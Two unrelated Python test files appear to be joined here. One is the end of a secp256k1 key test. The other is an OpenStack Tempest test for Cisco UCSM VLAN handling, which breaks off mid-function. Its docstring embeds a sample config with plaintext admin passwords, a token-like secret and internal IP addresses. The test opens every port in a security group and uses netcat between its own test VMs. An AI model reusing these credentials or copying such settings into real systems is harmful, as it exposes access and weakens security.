y = 0x51ED993EA0D455B75642E2098EA51448D967AE33BFBDFE40CFE97BDC47739922
test_points.append((k, x, y))
k = 5
x = 0x2F8BDE4D1A07209355B4A7250A5C5128E88B84BDDC619AB7CBA8D569B240EFE4
y = 0xD8AC222636E5E3D6D4DBA9DDA6C9C426F788271BAB0D6840DCA87D3AA6AC62D6
test_points.append((k, x, y))
k = 6
x = 0xFFF97BD5755EEEA420453A14355235D382F6472F8568A18B2F057A1460297556
y = 0xAE12777AACFBB620F3BE96017F45C560DE80F0F6518FE4A03C870C36B075F297
test_points.append((k, x, y))
k = 7
x = 0x5CBDF0646E5DB4EAA398F365F2EA7A0E3D419B7E0330E39CE92BDDEDCAC4F9BC
y = 0x6AEBCA40BA255960A3178D6D861A54DBA813D0B813FDE7B5A5082628087264DA
test_points.append((k, x, y))
k = 8
x = 0x2F01E5E15CCA351DAFF3843FB70F3C2F0A1BDD05E5AF888A67784EF3E10A2A01
y = 0x5C4DA8A741539949293D082A132D13B4C2E213D6BA5B7617B5DA2CB76CBDE904
test_points.append((k, x, y))
k = 9
x = 0xACD484E2F0C7F65309AD178A9F559ABDE09796974C57E714C35F110DFC27CCBE
y = 0xCC338921B0A7D9FD64380971763B61E9ADD888A4375F8E0F05CC262AC64F9C37
test_points.append((k, x, y))
k = 10
x = 0xA0434D9E47F3C86235477C7B1AE6AE5D3442D49B1943C2B752A68E2A47E247C7
y = 0x893ABA425419BC27A3B6C7E693A24C696F794C2ED877A1593CBEE53B037368D7
test_points.append((k, x, y))
k = 11
x = 0x774AE7F858A9411E5EF4246B70C65AAC5649980BE5C17891BBEC17895DA008CB
y = 0xD984A032EB6B5E190243DD56D7B7B365372DB1E2DFF9D6A8301D74C9C953C61B
test_points.append((k, x, y))
k = 12
x = 0xD01115D548E7561B15C38F004D734633687CF4419620095BC5B0F47070AFE85A
y = 0xA9F34FFDC815E0D7A8B64537E17BD81579238C5DD9A86D526B051B13F4062327
test_points.append((k, x, y))
k = 13
x = 0xF28773C2D975288BC7D1D205C3748651B075FBC6610E58CDDEEDDF8F19405AA8
y = 0x0AB0902E8D880A89758212EB65CDAF473A1A06DA521FA91F29B5CB52DB03ED81
test_points.append((k, x, y))
k = 14
x = 0x499FDF9E895E719CFD64E67F07D38E3226AA7B63678949E6E49B241A60E823E4
y = 0xCAC2F6C4B54E855190F044E4A7B3D464464279C27A3F95BCC65F40D403A13F5B
test_points.append((k, x, y))
k = 15
x = 0xD7924D4F7D43EA965A465AE3095FF41131E5946F3C85F79E44ADBCF8E27E080E
y = 0x581E2872A86C72A683842EC228CC6DEFEA40AF2BD896D3A5C504DC9FF6A26B58
test_points.append((k, x, y))
k = 16
x = 0xE60FCE93B59E9EC53011AABC21C23E97B2A31369B87A5AE9C44EE89E2A6DEC0A
y = 0xF7E3507399E595929DB99F34F57937101296891E44D23F0BE1F32CCE69616821
test_points.append((k, x, y))
k = 17
x = 0xDEFDEA4CDB677750A420FEE807EACF21EB9898AE79B9768766E4FAA04A2D4A34
y = 0x4211AB0694635168E997B0EAD2A93DAECED1F4A04A95C0F6CFB199F69E56EB77
test_points.append((k, x, y))
k = 18
x = 0x5601570CB47F238D2B0286DB4A990FA0F3BA28D1A319F5E7CF55C2A2444DA7CC
y = 0xC136C1DC0CBEB930E9E298043589351D81D8E0BC736AE2A1F5192E5E8B061D58
test_points.append((k, x, y))
k = 19
x = 0x2B4EA0A797A443D293EF5CFF444F4979F06ACFEBD7E86D277475656138385B6C
y = 0x85E89BC037945D93B343083B5A1C86131A01F60C50269763B570C854E5C09B7A
test_points.append((k, x, y))
k = 20
x = 0x4CE119C96E2FA357200B559B2F7DD5A5F02D5290AFF74B03F3E471B273211C97
y = 0x12BA26DCB10EC1625DA61FA10A844C676162948271D96967450288EE9233DC3A
test_points.append((k, x, y))
k = 112233445566778899
x = 0xA90CC3D3F3E146DAADFC74CA1372207CB4B725AE708CEF713A98EDD73D99EF29
y = 0x5A79D6B289610C68BC3B47F3D72F9788A26A06868B4D8E433E1E2AD76FB7DC76
test_points.append((k, x, y))
k = 112233445566778899112233445566778899
x = 0xE5A2636BCFD412EBF36EC45B19BFB68A1BC5F8632E678132B885F7DF99C5E9B3
y = 0x736C1CE161AE27B405CAFD2A7520370153C2C861AC51D6C1D5985D9606B45F39
test_points.append((k, x, y))
k = 28948022309329048855892746252171976963209391069768726095651290785379540373584
x = 0xA6B594B38FB3E77C6EDF78161FADE2041F4E09FD8497DB776E546C41567FEB3C
y = 0x71444009192228730CD8237A490FEBA2AFE3D27D7CC1136BC97E439D13330D55
test_points.append((k, x, y))
k = 57896044618658097711785492504343953926418782139537452191302581570759080747168
x = 0x00000000000000000000003B78CE563F89A0ED9414F5AA28AD0D96D6795F9C63
y = 0x3F3979BF72AE8202983DC989AEC7F2FF2ED91BDD69CE02FC0700CA100E59DDF3
test_points.append((k, x, y))
k = 86844066927987146567678238756515930889628173209306178286953872356138621120752
x = 0xE24CE4BEEE294AA6350FAA67512B99D388693AE4E7F53D19882A6EA169FC1CE1
y = 0x8B71E83545FC2B5872589F99D948C03108D36797C4DE363EBD3FF6A9E1A95B10
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494317
x = 0x4CE119C96E2FA357200B559B2F7DD5A5F02D5290AFF74B03F3E471B273211C97
y = 0xED45D9234EF13E9DA259E05EF57BB3989E9D6B7D8E269698BAFD77106DCC1FF5
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494318
x = 0x2B4EA0A797A443D293EF5CFF444F4979F06ACFEBD7E86D277475656138385B6C
y = 0x7A17643FC86BA26C4CBCF7C4A5E379ECE5FE09F3AFD9689C4A8F37AA1A3F60B5
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494319
x = 0x5601570CB47F238D2B0286DB4A990FA0F3BA28D1A319F5E7CF55C2A2444DA7CC
y = 0x3EC93E23F34146CF161D67FBCA76CAE27E271F438C951D5E0AE6D1A074F9DED7
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494320
x = 0xDEFDEA4CDB677750A420FEE807EACF21EB9898AE79B9768766E4FAA04A2D4A34
y = 0xBDEE54F96B9CAE9716684F152D56C251312E0B5FB56A3F09304E660861A910B8
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494321
x = 0xE60FCE93B59E9EC53011AABC21C23E97B2A31369B87A5AE9C44EE89E2A6DEC0A
y = 0x081CAF8C661A6A6D624660CB0A86C8EFED6976E1BB2DC0F41E0CD330969E940E
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494322
x = 0xD7924D4F7D43EA965A465AE3095FF41131E5946F3C85F79E44ADBCF8E27E080E
y = 0xA7E1D78D57938D597C7BD13DD733921015BF50D427692C5A3AFB235F095D90D7
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494323
x = 0x499FDF9E895E719CFD64E67F07D38E3226AA7B63678949E6E49B241A60E823E4
y = 0x353D093B4AB17AAE6F0FBB1B584C2B9BB9BD863D85C06A4339A0BF2AFC5EBCD4
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494324
x = 0xF28773C2D975288BC7D1D205C3748651B075FBC6610E58CDDEEDDF8F19405AA8
y = 0xF54F6FD17277F5768A7DED149A3250B8C5E5F925ADE056E0D64A34AC24FC0EAE
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494325
x = 0xD01115D548E7561B15C38F004D734633687CF4419620095BC5B0F47070AFE85A
y = 0x560CB00237EA1F285749BAC81E8427EA86DC73A2265792AD94FAE4EB0BF9D908
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494326
x = 0x774AE7F858A9411E5EF4246B70C65AAC5649980BE5C17891BBEC17895DA008CB
y = 0x267B5FCD1494A1E6FDBC22A928484C9AC8D24E1D20062957CFE28B3536AC3614
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494327
x = 0xA0434D9E47F3C86235477C7B1AE6AE5D3442D49B1943C2B752A68E2A47E247C7
y = 0x76C545BDABE643D85C4938196C5DB3969086B3D127885EA6C3411AC3FC8C9358
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494328
x = 0xACD484E2F0C7F65309AD178A9F559ABDE09796974C57E714C35F110DFC27CCBE
y = 0x33CC76DE4F5826029BC7F68E89C49E165227775BC8A071F0FA33D9D439B05FF8
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494329
x = 0x2F01E5E15CCA351DAFF3843FB70F3C2F0A1BDD05E5AF888A67784EF3E10A2A01
y = 0xA3B25758BEAC66B6D6C2F7D5ECD2EC4B3D1DEC2945A489E84A25D3479342132B
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494330
x = 0x5CBDF0646E5DB4EAA398F365F2EA7A0E3D419B7E0330E39CE92BDDEDCAC4F9BC
y = 0x951435BF45DAA69F5CE8729279E5AB2457EC2F47EC02184A5AF7D9D6F78D9755
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494331
x = 0xFFF97BD5755EEEA420453A14355235D382F6472F8568A18B2F057A1460297556
y = 0x51ED8885530449DF0C4169FE80BA3A9F217F0F09AE701B5FC378F3C84F8A0998
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494332
x = 0x2F8BDE4D1A07209355B4A7250A5C5128E88B84BDDC619AB7CBA8D569B240EFE4
y = 0x2753DDD9C91A1C292B24562259363BD90877D8E454F297BF235782C459539959
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494333
x = 0xE493DBF1C10D80F3581E4904930B1404CC6C13900EE0758474FA94ABE8C4CD13
y = 0xAE1266C15F2BAA48A9BD1DF6715AEBB7269851CC404201BF30168422B88C630D
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494334
x = 0xF9308A019258C31049344F85F89D5229B531C845836F99B08601F113BCE036F9
y = 0xC77084F09CD217EBF01CC819D5C80CA99AFF5666CB3DDCE4934602897B4715BD
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494335
x = 0xC6047F9441ED7D6D3045406E95C07CD85C778E4B8CEF3CA7ABAC09B95C709EE5
y = 0xE51E970159C23CC65C3A7BE6B99315110809CD9ACD992F1EDC9BCE55AF301705
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494336
x = 0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798
y = 0xB7C52588D95C3B9AA25B0403F1EEF75702E84BB7597AABE663B82F6F04EF2777
test_points.append((k, x, y))
k = 0xaa5e28d6a97a2479a65527f7290311a3624d4cc0fa1578598ee3c2613bf99522
x = 0x34f9460f0e4f08393d192b3c5133a6ba099aa0ad9fd54ebccfacdfa239ff49c6
y = 0x0b71ea9bd730fd8923f6d25a7a91e7dd7728a960686cb5a901bb419e0f2ca232
test_points.append((k, x, y))
k = 0x7e2b897b8cebc6361663ad410835639826d590f393d90a9538881735256dfae3
x = 0xd74bf844b0862475103d96a611cf2d898447e288d34b360bc885cb8ce7c00575
y = 0x131c670d414c4546b88ac3ff664611b1c38ceb1c21d76369d7a7a0969d61d97d
test_points.append((k, x, y))
k = 0x6461e6df0fe7dfd05329f41bf771b86578143d4dd1f7866fb4ca7e97c5fa945d
x = 0xe8aecc370aedd953483719a116711963ce201ac3eb21d3f3257bb48668c6a72f
y = 0xc25caf2f0eba1ddb2f0f3f47866299ef907867b7d27e95b3873bf98397b24ee1
test_points.append((k, x, y))
k = 0x376a3a2cdcd12581efff13ee4ad44c4044b8a0524c42422a7e1e181e4deeccec
x = 0x14890e61fcd4b0bd92e5b36c81372ca6fed471ef3aa60a3e415ee4fe987daba1
y = 0x297b858d9f752ab42d3bca67ee0eb6dcd1c2b7b0dbe23397e66adc272263f982
test_points.append((k, x, y))
k = 0x1b22644a7be026548810c378d0b2994eefa6d2b9881803cb02ceff865287d1b9
x = 0xf73c65ead01c5126f28f442d087689bfa08e12763e0cec1d35b01751fd735ed3
y = 0xf449a8376906482a84ed01479bd18882b919c140d638307f0c0934ba12590bde
test_points.append((k, x, y))
for k, x, y in test_points:
p = Point(secp256k1_curve, x, y)
self.assertTrue(secp256k1_curve.contains_point(p.x(), p.y()))
K = Key(public_pair=(x, y))
k = Key(secret_exponent=k)
self.assertEqual(K.public_pair(), k.public_pair())
x = y = 0
self.assertRaises(NoSuchPointError, Point, secp256k1_curve, x, y)
self.assertRaises(InvalidPublicPairError, Key, public_pair=(0, 0))
def test_repr(self):
    """repr() of keys recovered from their textual (address/WIF) forms."""
    base_key = Key(secret_exponent=273, netcode='XTN')
    # A key parsed back from its address is public-only.
    from_address = Key.from_text(base_key.address())
    self.assertEqual(repr(from_address), '<mhDVBkZBWLtJkpbszdjZRkH1o5RZxMwxca>')
    # A key parsed back from its WIF keeps the private half.
    from_wif = Key.from_text(base_key.wif())
    self.assertEqual(repr(from_wif), 'private_for <0264e1b1969f9102977691a40431b0b672055dcf31163897d996434420e6c95dc9>')
# Allow running this test module directly, outside a test runner.
if __name__ == '__main__':
    unittest.main()
| |
# Copyright 2015 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
The tests need special image uploaded to glance:
* It has "Cisco enic" driver installed
* Configured to log into it with username/password
Before running the tests:
* create 'tempest.conf' file in 'etc' folder (default location)
* add/update following parameters to tempest.conf
* replace parameter values with correct ones for your OS installation
##############################################################################
# Example of tempest.conf file
##############################################################################
[DEFAULT]
debug = true
use_stderr = false
log_file = tempest.log
[auth]
tempest_roles = _member_
allow_tenant_isolation = True
[compute]
ssh_auth_method = 'configured'
# username to log into an instance.
image_ssh_user = 'root'
# password to log into an instance
image_ssh_password = 'ubuntu'
# flavor id. The flavor should have >= 4Gb of RAM
flavor_ref = 3
flavor_ref_alt = 3
# Image id. Used to boot an instance
image_ref = 60ad4b1e-c5d4-49ad-a9ca-6374c1d8b3f6
# Same as above
image_ref_alt = 60ad4b1e-c5d4-49ad-a9ca-6374c1d8b3f6
[identity]
username = demo
tenant_name = demo
password = demo
alt_username = alt_demo
alt_tenant_name = alt_demo
alt_password = secrete
# There should be OS admin user (with admin role) credentials.
# It will be used by the tests to create another non-admin users
admin_username = admin
admin_tenant_name = admin
admin_domain_name = Default
disable_ssl_certificate_validation = false
# Set correct IP address
uri = http://172.29.173.85:5000/v2.0/
auth_version = v2
# Set correct admin password
admin_password = 1567c9ff7c66376a333d28dfa1a5a3cd717156c7
# Set correct IP address
uri_v3 = http://172.29.173.85:5000/v3/
# Set correct admin tenant id
admin_tenant_id = 725d6fa98000418f88e47d283d8f1efb
[service_available]
neutron = True
[network]
# id of your public network
public_network_id = 1c87c1d3-bd1a-4738-bd55-99a84fa45c87
[ucsm]
# UCSM VIP
ucsm_ip=10.30.119.66
# UCSM username
ucsm_username=admin
# UCSM password
ucsm_password=cisco
# Dictionary of <hostname> VS <UCSM service profile name>. Compute nodes
compute_host_dict=controller:org-root/ls-tmpl,compute-1:org-root/ls-tmpl
# Dictionary of <hostname> VS <UCSM service profile name>. Controller nodes
controller_host_dict=controller:org-root/ls-tmpl
# List of vNIC names
eth_names=eth0,eth1
# Amount of "SR-IOV ports"/"Dynamic VNICs"/"Virtual functions"
virtual_functions_amount=4
# Set it to False if you want to skip connectivity tests
test_connectivity=True
# Parameters needed for testing multi-ucsm installation
# UCSMs list. Each UCSM has its own section named [ucsm:<ucsm ip>] below
ucsm_list = 10.10.0.200,10.10.0.156
# List of physical networks used in Openstack
physnets = physnet1
# Parameters of a particular UCSM
[ucsm:10.10.0.200]
eth_names=eth0,eth1
ucsm_username=ucspe
ucsm_password=ucspe
# Dictionary of controller nodes and service profiles associated with them
controller_host_dict=controller:org-root/ls-sp11
# Dictionary of compute nodes and service profiles associated with them
compute_host_dict=controller:org-root/ls-sp11
# Dictionary of vNIC templates
vnic_template_dict = physnet1:org-root/lan-conn-templ-vnic_template
[ucsm:10.10.0.156]
eth_names=eth0,eth1
ucsm_username=ucspe
ucsm_password=ucspe
#controller_host_dict=controller
compute_host_dict=compute-1:org-root/ls-sp21
vnic_template_dict = physnet1:org-root/lan-conn-templ-vnic_template
##############################################################################
#
##############################################################################
Use environment variables to set location of "tempest.conf"
Ex:
export TEMPEST_CONFIG_DIR=/etc/redhat-certification-openstack/
export TEMPEST_CONFIG=tempest.conf
It is better to create dedicated virtualenv for the tempest:
* Run: 'virtualenv myenv'
* Activate the environment. Run: 'source myenv/bin/activate'
* Install python requirements: Run: 'pip install -r requirements.txt'
Running tests:
* Create testr repository: 'testr init'
* Look for tests: 'testr list-tests | grep cisco'
* Run tests:
'testr run tempest.thirdparty.cisco.test_ucsm'
"""
import netaddr
import random
import testtools
import time
from oslo_log import log
from tempest.lib.common.utils import data_utils
from tempest.lib.common.utils import test_utils
from tempest.common import waiters
from tempest import config
from tempest import exceptions
from tempest.scenario import manager
from tempest import test
from tempest.thirdparty.cisco import base as cisco_base
CONF = config.CONF
LOG = log.getLogger(__name__)
class FuzzyDict(dict):
    """A dict that also accepts attribute assignment.

    Plain ``dict`` instances cannot grow attributes; the tests below
    attach a ``delete`` callable to network dicts (see
    ``_create_network``), so they wrap them in this subclass.
    """
    pass
class UCSMTest(manager.NetworkScenarioTest, cisco_base.UCSMTestMixin):
@classmethod
def setup_credentials(cls):
    """Set up test credentials without auto-creating network resources."""
    # Create no network resources for these tests.
    # Must be requested before the base class builds credentials.
    cls.set_network_resources()
    super(UCSMTest, cls).setup_credentials()
@classmethod
def setup_clients(cls):
    """Initialize API clients; all operations use admin credentials."""
    cls.manager = cls.os_adm
    super(UCSMTest, cls).setup_clients()
    # TODO: remove lines below
    cls.admin_networks_client = cls.os_adm.networks_client
    cls.admin_ports_client = cls.os_adm.ports_client
    cls.admin_hosts_client = cls.os_adm.hosts_client
    cls.servers_client = cls.os_adm.servers_client
@classmethod
def resource_setup(cls):
    """Run base resource setup, then the UCSM-specific setup from the mixin."""
    super(UCSMTest, cls).resource_setup()
    super(UCSMTest, cls).ucsm_resource_setup()
def setUp(self):
    """Per-test setup: security group, UCSM login, and cleanup hook."""
    super(UCSMTest, self).setUp()
    self.keypairs = {}  # keypair name -> keypair dict (read by _get_server_key)
    self.servers = []   # servers booted by this test
    self.security_group = self._create_security_group(
        security_group_rules_client=self.security_group_rules_client,
        security_groups_client=self.security_groups_client)
    # Log into UCS Manager
    self.ucsm_setup()
    self.addCleanup(self.ucsm_cleanup)
def _create_security_group(self, security_group_rules_client=None,
                           tenant_id=None,
                           namestart='secgroup-smoke',
                           security_groups_client=None):
    """Create a security group that allows all TCP and UDP traffic.

    ``tenant_id`` and ``namestart`` are accepted for signature
    compatibility with the parent helper but are not forwarded here.

    :returns: the created security group dict.
    """
    secgroup = super(UCSMTest, self)._create_security_group(
        security_group_rules_client=security_group_rules_client,
        security_groups_client=security_groups_client)
    # Open the full port range for TCP and UDP, in both directions.
    for protocol in ('tcp', 'udp'):
        for direction in ('ingress', 'egress'):
            self._create_security_group_rule(
                sec_group_rules_client=security_group_rules_client,
                security_groups_client=security_groups_client,
                secgroup=secgroup,
                protocol=protocol,
                port_range_min=1,
                port_range_max=65535,
                direction=direction)
    return secgroup
def _get_server_key(self, server):
    """Return the private key of the keypair used to boot *server*."""
    keypair = self.keypairs[server['key_name']]
    return keypair['private_key']
def create_networks(self, networks_client=None,
                    tenant_id=None, dns_nameservers=None,
                    network_kwargs=None):
    """Create a network with a subnet connected to a router.

    The baremetal driver is a special case since all nodes are
    on the same shared network.

    :param networks_client: network client to create resources with
        (currently unused; default clients are used instead).
    :param tenant_id: id of tenant to create resources in.
    :param dns_nameservers: list of dns servers to send to subnet.
    :param network_kwargs: extra kwargs forwarded to network creation.
    :returns: network, subnet, router (subnet and router are ``None``
        for baremetal and provider-network deployments).
    """
    network_kwargs = network_kwargs or {}
    if CONF.baremetal.driver_enabled:
        # NOTE(Shrews): This exception is for environments where tenant
        # credential isolation is available, but network separation is
        # not (the current baremetal case). Likely can be removed when
        # test account mgmt is reworked:
        # https://blueprints.launchpad.net/tempest/+spec/test-accounts
        if not CONF.compute.fixed_network_name:
            m = 'fixed_network_name must be specified in config'
            raise exceptions.InvalidConfiguration(m)
        network = self._get_network_by_name(
            CONF.compute.fixed_network_name)
        router = None
        subnet = None
    else:
        network = self._create_network(**network_kwargs)
        if CONF.ucsm.provider_network_id:
            # Provider networks come pre-wired; no router/subnet needed.
            router = None
            subnet = None
        else:
            router = self._get_router(tenant_id=tenant_id)
            subnet_kwargs = dict(network=network)
            # use explicit check because empty list is a valid option
            if dns_nameservers is not None:
                subnet_kwargs['dns_nameservers'] = dns_nameservers
            subnet = self._create_subnet(**subnet_kwargs)
            self.routers_client.add_router_interface(router['id'], subnet_id=subnet['id'])
    return network, subnet, router
def _create_network(self, networks_client=None, routers_client=None,
                    tenant_id=None, namestart='network-smoke-', **kwargs):
    """Create a tenant network, or wrap the configured provider network.

    :param networks_client: client used to create/show the network.
    :param routers_client: accepted for signature compatibility; unused.
    :param tenant_id: tenant to create the network in.
    :param namestart: prefix for the generated network name.
    :returns: a FuzzyDict for the network, with a ``delete`` callable
        attached (a no-op for provider networks).
    """
    if not networks_client:
        networks_client = self.networks_client
    if not tenant_id:
        tenant_id = networks_client.tenant_id
    if not routers_client:
        routers_client = self.routers_client
    name = data_utils.rand_name(namestart)
    if CONF.ucsm.provider_network_id:
        # Get info because this is provider network
        result = networks_client.show_network(CONF.ucsm.provider_network_id)
        network = FuzzyDict(result['network'])
        # Alias the pre-existing network under the generated name; the
        # real provider network keeps its own name in Neutron.
        network['name'] = name
        # Mock delete method because this is provider network
        network.delete = lambda: True
    else:
        result = networks_client.create_network(name=name, tenant_id=tenant_id,
                                                **kwargs)
        network = FuzzyDict(result['network'])
        self.addCleanup(test_utils.call_and_ignore_notfound_exc,
                        self.networks_client.delete_network,
                        network['id'])
        # some tests may still expect delete method
        network.delete = lambda: self.networks_client.delete_network(network['id'])
    # Bug fix: this assertion used to run BEFORE the provider-network
    # name was aliased above, so it always failed for provider networks.
    self.assertEqual(network['name'], name)
    return network
def _create_port(self, network_id, client=None, namestart='port-quotatest',
                 **kwargs):
    """Create a Neutron port on *network_id* and schedule its deletion.

    :returns: the created port dict.
    """
    ports_client = client or self.ports_client
    port_name = data_utils.rand_name(namestart)
    result = ports_client.create_port(
        name=port_name,
        network_id=network_id,
        **kwargs)
    self.assertIsNotNone(result, 'Unable to allocate port')
    port = result['port']
    # Best-effort cleanup: ignore the port already being gone.
    self.addCleanup(test_utils.call_and_ignore_notfound_exc,
                    ports_client.delete_port, port['id'])
    return port
def _create_server(self, name, network_id=None,
                   port_id=None, availability_zone=None):
    """Boot a server on the given network/port and wait until ACTIVE.

    A fresh keypair is created and remembered in ``self.keypairs`` so
    ``_get_server_key`` can retrieve it later.
    """
    keypair = self.create_keypair(client=self.keypairs_client)
    self.keypairs[keypair['name']] = keypair
    # Build the single NIC spec from whichever ids were supplied.
    nic = {}
    if network_id is not None:
        nic['uuid'] = network_id
    if port_id is not None:
        nic['port'] = port_id
    create_kwargs = {
        'networks': [nic],
        'key_name': keypair['name'],
        'security_groups': [{'name': self.security_group['name']}],
    }
    if availability_zone is not None:
        create_kwargs['availability_zone'] = availability_zone
    server = self.create_server(name=name, wait_until='ACTIVE',
                                clients=self.os_adm, **create_kwargs)
    self.servers.append(server)
    return server
def create_floating_ip(self, thing, external_network_id=None,
                       port_id=None, client=None):
    """Creates a floating IP and associates to a resource/port using
    Neutron client

    :param thing: resource dict (typically a server) to associate with.
    :param external_network_id: network to allocate the IP from;
        defaults to CONF.network.public_network_id.
    :param port_id: port to bind; looked up from *thing* when omitted.
    :param client: floating IPs client; defaults to
        self.floating_ips_client.
    :returns: floating IP dict. For provider-network deployments a fake
        dict is returned whose floating address equals the fixed one.
    """
    if not external_network_id:
        external_network_id = CONF.network.public_network_id
    if not client:
        client = self.floating_ips_client
    if not port_id:
        port_id, ip4 = self._get_server_port_id_and_ip4(thing)
    else:
        # With an explicit port_id no fixed IP is passed to Neutron.
        ip4 = None
    if CONF.ucsm.provider_network_id:
        # Provider networks have no floating IPs; pretend the fixed IP
        # is the floating one so callers can connect directly.
        return {
            'floating_ip_address': ip4,
            'fixed_ip_address': ip4
        }
    result = client.create_floatingip(
        floating_network_id=external_network_id,
        port_id=port_id,
        tenant_id=thing['tenant_id'],
        fixed_ip_address=ip4
    )
    # NOTE(review): Neutron responses usually key this as 'floatingip';
    # confirm 'floating_ip' matches the client version in use.
    floating_ip = result['floating_ip']
    # NOTE(review): cleanup goes through the *compute* floating IPs
    # client although the IP was created via Neutron -- confirm intended.
    self.addCleanup(test_utils.call_and_ignore_notfound_exc,
                    self.compute_floating_ips_client.delete_floating_ip,
                    floating_ip['id'])
    return floating_ip
def check_public_network_connectivity(
        self, server, floating_ip, should_connect=True, msg=None,
        should_check_floating_ip_status=True):
    """Verify connectivity to a VM via public network and floating IP,
    and that the floating IP resource status is as expected.
    """
    ssh_login = CONF.validation.image_ssh_user
    ip_address = floating_ip['floating_ip_address']
    if should_connect:
        private_key = self._get_server_key(server)
        expected_status = 'ACTIVE'
    else:
        private_key = None
        expected_status = 'DOWN'
    # Provider-network deployments have no Neutron floating IPs whose
    # status could be checked.
    if should_check_floating_ip_status and not CONF.ucsm.provider_network_id:
        self.check_floating_ip_status(floating_ip, expected_status)
    # Delegate the actual SSH reachability check to the parent class.
    super(UCSMTest, self).check_public_network_connectivity(
        ip_address, ssh_login, private_key, should_connect, msg,
        self.servers)
def assert_vm_to_vm_connectivity(self, server1, server2):
    """Assert that the two servers can ping each other's floating IPs."""
    fip1 = self.create_floating_ip(server1)
    fip2 = self.create_floating_ip(server2)
    # Wait while driver applies settings
    time.sleep(10)
    ssh_clients = []
    for srv, fip in ((server1, fip1), (server2, fip2)):
        ssh_clients.append(self.get_remote_client(
            fip['floating_ip_address'],
            CONF.validation.image_ssh_user,
            self._get_server_key(srv)))
    # Ping server2 from server1 and vice versa.
    self.assertNotEmpty(
        ssh_clients[0].ping_host(fip2['floating_ip_address']))
    self.assertNotEmpty(
        ssh_clients[1].ping_host(fip1['floating_ip_address']))
def assert_vm2vm(self, server1, server2):
    """Assert TCP connectivity between two servers using netcat.

    server2 runs a netcat listener; server1 sends a short message to
    it; the payload read back on server2 must equal what was sent.
    """
    floating_ip1 = self.create_floating_ip(server1)
    floating_ip2 = self.create_floating_ip(server2)
    # Wait while driver applies settings
    time.sleep(10)
    server1_client = self.get_remote_client(
        floating_ip1['floating_ip_address'],
        CONF.validation.image_ssh_user,
        self._get_server_key(server1))
    server2_client = self.get_remote_client(
        floating_ip2['floating_ip_address'],
        CONF.validation.image_ssh_user,
        self._get_server_key(server2))
    nc = 'nc'
    port = 5000
    message = 'Hi there!'
    # Run listener
    # Kill any stale listener from a previous attempt first.
    server2_client.exec_command('kill -9 `pidof "nc"` || true')
    server2_client.exec_command('{0} -l -p {1} -s {2} > out.log &'.format(nc, port, floating_ip2['fixed_ip_address']))
    # Send message
    # NOTE(review): both {2} (source port via -p) and {4} (destination
    # port) expand to 5000 here -- confirm the duplicated port is intended.
    server1_client.exec_command(
        'echo -n "{0}" | {1} -w1 -p {2} {3} {4} || true'.format(message, nc, port, floating_ip2['fixed_ip_address'], port))
    # Read received message
    received = server2_client.exec_command("cat out.log; rm out.log")
    self.assertEqual(message, received, 'Verify received message')
def _delete_network(self, network):
    """Delete the given network by its id."""
    network_id = network['id']
    self.networks_client.delete_network(network_id)
def _delete_networks(self, networks):
    """Delete *networks* and assert none of them is still listed."""
    for network in networks:
        self._delete_network(network)
    # Asserting that the networks are not found in the list after deletion
    listed = self.networks_client.list_networks()
    remaining_ids = [entry['id'] for entry in listed['networks']]
    for network in networks:
        self.assertNotIn(network['id'], remaining_ids)
@test.attr(type='non-sriov')
def test_create_delete_networks(self):
    """Covered test cases:

    * Creating vlan profiles
    * Deleting vlan profiles
    * Adding vlans to both VNICs of a service profile
    * Deleting vlans from both VNICs of a service profile
    """
    self._verify_single_ucsm_configured()
    # Create network and subnet (DHCP enabled)
    network = self._create_network()
    self.assertEqual('ACTIVE', network['status'])
    self._create_subnet(network)
    port = self._create_port(
        network['id'], security_groups=[self.security_group['id']])
    # Get a vlan id and verify a vlan profile has been created
    network = self.admin_networks_client.show_network(network['id'])['network']
    vlan_id = network['provider:segmentation_id']
    # Verify VLAN Profiles have not been created yet because there are no
    # active ports
    self.timed_assert(self.assertEmpty,
                      lambda: self.ucsm.get_vlan_profile(vlan_id))
    server = self._create_server(data_utils.rand_name('server-smoke'),
                                 port_id=port['id'])
    self.timed_assert(self.assertNotEmpty,
                      lambda: self.ucsm.get_vlan_profile(vlan_id))
    # Verify vlan has been added to both vnics
    for service_profile in self.controller_host_dict.values():
        for eth_name in self.eth_names:
            self.timed_assert(
                self.assertNotEmpty,
                lambda: self.ucsm.get_ether_vlan(service_profile,
                                                 eth_name, vlan_id))
    # Delete network and verify that the vlan profile has been removed
    self.servers_client.delete_server(server['id'])
    # Bug fix: wait for THIS server's termination -- previously the
    # literal list ['id'] was passed instead of server['id'].
